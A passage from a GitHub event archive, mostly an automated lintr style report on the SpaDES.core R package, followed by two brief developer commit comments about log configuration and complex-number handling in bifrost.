\",verbs[[fn]],\" not declared in inputObjects\")\n                                ^\n```\n[R/code-checking.R:504:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/code-checking.R#L504) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                            ^\n```\n[R/code-checking.R:516:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/code-checking.R#L516) *style:* **Commas should always have a space after.**\n```r\n​        \" \",verb,\" used from sim inside \",\n            ^\n```\n[R/code-checking.R:516:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/code-checking.R#L516) *style:* **Commas should always have a space after.**\n```r\n​        \" \",verb,\" used from sim inside \",\n                 ^\n```\n[R/code-checking.R:518:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/code-checking.R#L518) *style:* **Commas should always have a space after.**\n```r\n​        \", but \",verb,\" not declared in inputObjects\"\n                 ^\n```\n[R/code-checking.R:518:23:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/code-checking.R#L518) *style:* **Commas should always have a space after.**\n```r\n​        \", but \",verb,\" not declared in inputObjects\"\n                      ^\n```\n[R/code-checking.R:661:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/code-checking.R#L661) *style:* **Commented code should be removed.**\n```r\n​    #unique(pd[outerWh, \"line1\"])\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:665:34:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/code-checking.R#L665) *style:* **Commas should always have a space after.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                 ^\n```\n[R/code-checking.R:665:64:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/code-checking.R#L665) *style:* **Commas should always have a space after.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                                               ^\n```\n[R/code-checking.R:665:79:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/code-checking.R#L665) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                                                              ^\n```\n[R/copy.R:37:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/copy.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​            sim_ <- object\n            ^~~~\n```\n[R/downloadData.R:54:96:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/downloadData.R#L54) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    io <- .parseModulePartial(sim, modules = list(module), defineModuleElement = \"inputObjects\" )\n                                                                                               ^\n```\n[R/downloadData.R:242:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/downloadData.R#L242) *style:* **Commented code should be removed.**\n```r\n​    # parsedModule <- parse(file = file.path(path, module, paste0(module, '.R')))\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:243:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/downloadData.R#L243) *style:* **Commented code should be removed.**\n```r\n​    # urls <- .getSourceURL(pattern = fileToDownload, x = parsedModule)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:250:8:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/downloadData.R#L250) *style:* **Commented code should be removed.**\n```r\n​      #urls <- moduleMetadata(module, path)$inputObjects$sourceURL\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:268:27:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/downloadData.R#L268) *style:* **Commas should always have a space after.**\n```r\n​    chksums2 <- chksums[0,]\n                          ^\n```\n[R/downloadData.R:269:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/downloadData.R#L269) *style:* **Commented code should be removed.**\n```r\n​    #children <- moduleMetadata(module, path)$childModules\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:272:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/downloadData.R#L272) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n            ^\n```\n[R/downloadData.R:272:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/downloadData.R#L272) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                 ^\n```\n[R/downloadData.R:272:54:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/downloadData.R#L272) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                                                     ^\n```\n[R/downloadData.R:272:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/downloadData.R#L272) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                                                       ^\n```\n[R/experiment.R:200:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/experiment.R#L200) *style:* **Commented code should be removed.**\n```r\n​    #sim <- Copy(sim, objects = FALSE, queues = TRUE)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:215:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/experiment.R#L215) *style:* **Commented code should be removed.**\n```r\n​    # cl <- tryCatch(getCluster(), error = function(x) NULL)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:216:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/experiment.R#L216) *style:* **Commented code should be removed.**\n```r\n​    # on.exit(if (!is.null(cl)) returnCluster(), add = TRUE)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:218:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/experiment.R#L218) *style:* **Commented code should be removed.**\n```r\n​    #if (length(modules) == 0) modules <- list(modules(sim)[-(1:4)])\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:222:11:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/experiment.R#L222) *style:* **Commented code should be removed.**\n```r\n​        # unlist(params[paramsTmp], recursive = FALSE)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:314:58:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/experiment.R#L314) *style:* **Commented code should be removed.**\n```r\n​            params(sim_)[[mod[x]]][[param[[x]]]] <- val #factorialExp[ind,x]\n                                                         ^~~~~~~~~~~~~~~~~~~\n```\n[R/helpers.R:230:74:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/helpers.R#L230) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​                             paste0(\"package:\", .pkgEnv$corePackagesVec[-(1:2)]))\n                                                                         ^\n```\n[R/helpers.R:260:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/helpers.R#L260) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​all.equal.simList <- function(target, current, ...) {\n^~~~~~~~~~~~~~~~~\n```\n[R/load.R:198:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/load.R#L198) *style:* **Lines should not be more than 100 characters.**\n```r\n​                names(argument) <- c(nam, names(formals(getFromNamespace(loadFun[y], loadPackage[y])))[1])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/misc-methods.R:467:55:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/misc-methods.R#L467) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​          (inherits(get(w, envir = envir), \"integer\")) ) {\n                                                      ^\n```\n[R/module-define.R:719:63:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/module-define.R#L719) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      exts <- na.omit(match(file_ext(fl), .fileExts[, \"exts\"]) )\n                                                              ^\n```\n[R/module-dependencies-class.R:53:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/module-dependencies-class.R#L53) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​            out.df <- data.frame(\n            ^~~~~~\n```\n[R/module-dependencies-class.R:172:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/module-dependencies-class.R#L172) *style:* **Commented code should be removed.**\n```r\n​    #   warning(\"input object data.frame should use colnames sourceURL.\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-dependencies-class.R:174:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/module-dependencies-class.R#L174) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( !all(colnames(.outputObjects()) %in% colnames(object@outputObjects)) ) {\n        ^\n```\n[R/module-dependencies-class.R:174:78:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/module-dependencies-class.R#L174) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( !all(colnames(.outputObjects()) %in% colnames(object@outputObjects)) ) {\n                                                                             ^\n```\n[R/module-dependencies-methods.R:43:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/module-dependencies-methods.R#L43) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- .depsEdgeListMem(deps, plot)\n    ^~\n```\n[R/module-dependencies-methods.R:56:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/module-dependencies-methods.R#L56) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  sim.in <- sim.out <- data.table(objectName = character(0),\n  ^~~~~~\n```\n[R/module-dependencies-methods.R:56:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/module-dependencies-methods.R#L56) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  sim.in <- sim.out <- data.table(objectName = character(0),\n            ^~~~~~~\n```\n[R/module-dependencies-methods.R:61:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/module-dependencies-methods.R#L61) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      z.in <- as.data.table(x@inputObjects)[, .(objectName, objectClass)]\n      ^~~~\n```\n[R/module-dependencies-methods.R:62:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/module-dependencies-methods.R#L62) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      z.out <- as.data.table(x@outputObjects)[, .(objectName, objectClass)]\n      ^~~~~\n```\n[R/module-dependencies-methods.R:65:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/module-dependencies-methods.R#L65) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​        sim.in <<- rbindlist(list(sim.in, z.in), use.names = TRUE)\n        ^~~~~~\n```\n[R/module-dependencies-methods.R:68:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/module-dependencies-methods.R#L68) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​        sim.out <<- rbindlist(list(sim.out, z.out), use.names = TRUE)\n        ^~~~~~~\n```\n[R/module-dependencies-methods.R:80:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/module-dependencies-methods.R#L80) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- dx[, list(from = module, to = i.module,\n    ^~\n```\n[R/module-dependencies-methods.R:83:15:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/module-dependencies-methods.R#L83) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    if (plot) DT <- DT[!duplicated(DT[, 1:2, with = FALSE]), ]\n              ^~\n```\n[R/module-dependencies-methods.R:85:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/module-dependencies-methods.R#L85) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- data.table(from = character(0), to = character(0),\n    ^~\n```\n[R/module-dependencies-methods.R:164:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/module-dependencies-methods.R#L164) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    M <- distances(simGraph, mode = \"out\")\n    ^\n```\n[R/module-dependencies-methods.R:196:39:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/module-dependencies-methods.R#L196) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​      missingObjects <- simEdgeList %>% filter(from != to) %>%\n                                    ~~^\n```\n[R/module-dependencies-methods.R:210:26:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/module-dependencies-methods.R#L210) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​    return(newEdgeList %>% data.table() %>% setorder(\"from\", \"to\", \"objName\"))\n                       ~~^\n```\n[R/module-dependencies-methods.R:246:79:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/module-dependencies-methods.R#L246) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​              loadOrder <- names(simGraph[[tsort, ]]) %>% .[!(. %in% \"_INPUT_\" )]\n                                                                              ^\n```\n[R/module-repository.R:28:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/module-repository.R#L28) *style:* **Lines should not be more than 100 characters.**\n```r\n​#'          (\\url{http://spades-core.predictiveecology.org/articles/ii-modules.html#module-directory-structure-modulename}),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:52:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/module-repository.R#L52) *style:* **Lines should not be more than 100 characters.**\n```r\n​    zipFiles <- grep(file.path(name, \"data\"), zipFiles, invert = TRUE, value = TRUE) # remove any zip in data folder\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:293:8:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/module-repository.R#L293) *style:* **Commented code should be removed.**\n```r\n​      #versionWarning(name, version)\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:305:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/module-repository.R#L305) *style:* **Lines should not be more than 100 characters.**\n```r\n​        GET(zip, ua, config = list(config(token = pat)), write_disk(localzip, overwrite = overwrite))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:401:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/module-repository.R#L401) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/module-repository.R:402:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/module-repository.R#L402) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/moduleMetadata.R:75:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/moduleMetadata.R#L75) *style:* **Commented code should be removed.**\n```r\n​    #metadata <- eval(parse(text = x)) # can't be used because can't evaluate start(sim)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:78:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/plotting-diagrams.R#L78) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- tail(completed(sim), n)\n    ^~\n```\n[R/plotting-diagrams.R:173:28:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/plotting-diagrams.R#L173) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​        sapply(ll, NROW) %>% sum() %>% `*`(., 26L)\n                         ~~^\n```\n[R/plotting-diagrams.R:325:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/plotting-diagrams.R#L325) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      PlotRemovingDots <- function(modDia, plotFn, axes, ...,\n      ^~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:326:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/plotting-diagrams.R#L326) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.color,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:327:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/plotting-diagrams.R#L327) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.size,\n                                   ^~~~~~~~~~~\n```\n[R/plotting-diagrams.R:328:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/plotting-diagrams.R#L328) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.size2,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:329:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/plotting-diagrams.R#L329) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.shape,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:330:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/plotting-diagrams.R#L330) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.label.cex,\n                                   ^~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:331:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/plotting-diagrams.R#L331) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.label.family,\n                                   ^~~~~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:345:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/plotting-diagrams.R#L345) *style:* **Lines should not be more than 100 characters.**\n```r\n​          c(nchar(namesModDia)^0.8 * 10) # use exponential to stretch out, and multiplication to make all bigger\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting.R:6:31:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                              na.color, zero.color, length){\n                              ^~~~~~~~\n```\n[R/plotting.R:6:41:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                              na.color, zero.color, length){\n                                        ^~~~~~~~~~\n```\n[R/plotting.R:37:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/plotting.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        na.color, zero.color, length) {\n                        ^~~~~~~~\n```\n[R/plotting.R:37:35:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/plotting.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        na.color, zero.color, length) {\n                                  ^~~~~~~~~~\n```\n[R/plotting.R:86:22:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/plotting.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​      eval(parse(text=deparse(elems[[useElem]])), envir=tmp@.envir),\n                    ~^~\n```\n[R/plotting.R:86:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/plotting.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​      eval(parse(text=deparse(elems[[useElem]])), envir=tmp@.envir),\n                                                      ~^~\n```\n[R/plotting.R:87:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n          ~^~\n```\n[R/plotting.R:87:40:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n                                      ~^~\n```\n[R/plotting.R:87:74:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n                                                                        ~^~\n```\n[R/POM.R:131:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/POM.R#L131) *style:* **Lines should not be more than 100 characters.**\n```r\n​#' @param objFnCompare Character string. Either, \"MAD\" or \"RMSE\" indicating that inside the objective\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/POM.R:189:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/POM.R#L189) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​           NaNRetries = NA, logObjFnVals = FALSE, weights, useLog = FALSE) {\n           ^~~~~~~~~~\n```\n[R/POM.R:199:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/POM.R#L199) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        NaNRetries, logObjFnVals, weights, useLog) {\n                        ^~~~~~~~~~\n```\n[R/POM.R:216:28:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/POM.R#L216) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    if (is.na(NaNRetries)) NaNRetries <- 1\n                           ^~~~~~~~~~\n```\n[R/POM.R:240:11:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/POM.R#L240) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​          sim_ <- Copy(sim)\n          ^~~~\n```\n[R/POM.R:258:66:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/POM.R#L258) *style:* **Put spaces around all infix operators.**\n```r\n​          envPOMCalled <- sys.frame(min(grep(\"POM\", sys.calls()))-1)\n                                                                ~^~\n```\n[R/POM.R:325:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/POM.R#L325) *style:* **Lines should not be more than 100 characters.**\n```r\n​          cat(format(unlist(lapply(objectiveRes, function(x) x[[\"value\"]])), digits = 4), dep = \"\\t\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/POM.R:363:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/R/POM.R#L363) *style:* **Lines should not be more than 100 characters.**\n```r\n​      par[whP] <- unlist(deps[[modName]]@parameters$default[deps[[modName]]@parameters$paramName == names(P(sim, modName)[whParamsByMod[whP]])])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n"}},"created_at":"2018-07-24T03:17:38Z"}
{"id":"8007578274","type":"CommitCommentEvent","actor":{"login":"BranSummer"},"repo":{"name":"BranSummer/branroom"},"payload":{"comment":{"id":29808412,"position":null,"line":null,"path":null,"commit_id":"184368f83f749d29060104a74e63e3691f78b7cc","created_at":"2018-07-24T03:17:58Z","updated_at":"2018-07-24T03:17:58Z","author_association":"OWNER","body":"日志地址配置"}},"created_at":"2018-07-24T03:17:58Z"}
{"id":"8007583930","type":"CommitCommentEvent","actor":{"login":"jaycedowell"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29808419,"position":80,"line":588,"path":"epic_bf_dev/EPIC_bifrost.py","commit_id":"e7252a0697a584f1c8795371b636a21d2afc15d9","created_at":"2018-07-24T03:20:04Z","updated_at":"2018-07-24T03:20:04Z","author_association":"COLLABORATOR","body":"Ha ha, it is documented... in Complex.hpp :D  Seriously, though, we should probably keep a list of bifrost oddities so that I can work on getting them addressed.\r\n\r\nYou should be able to use something like `a(i,j,k,in) = b(i,j,k,in)*b(i,j,k,in).conj()`."}},"created_at":"2018-07-24T03:20:04Z"}
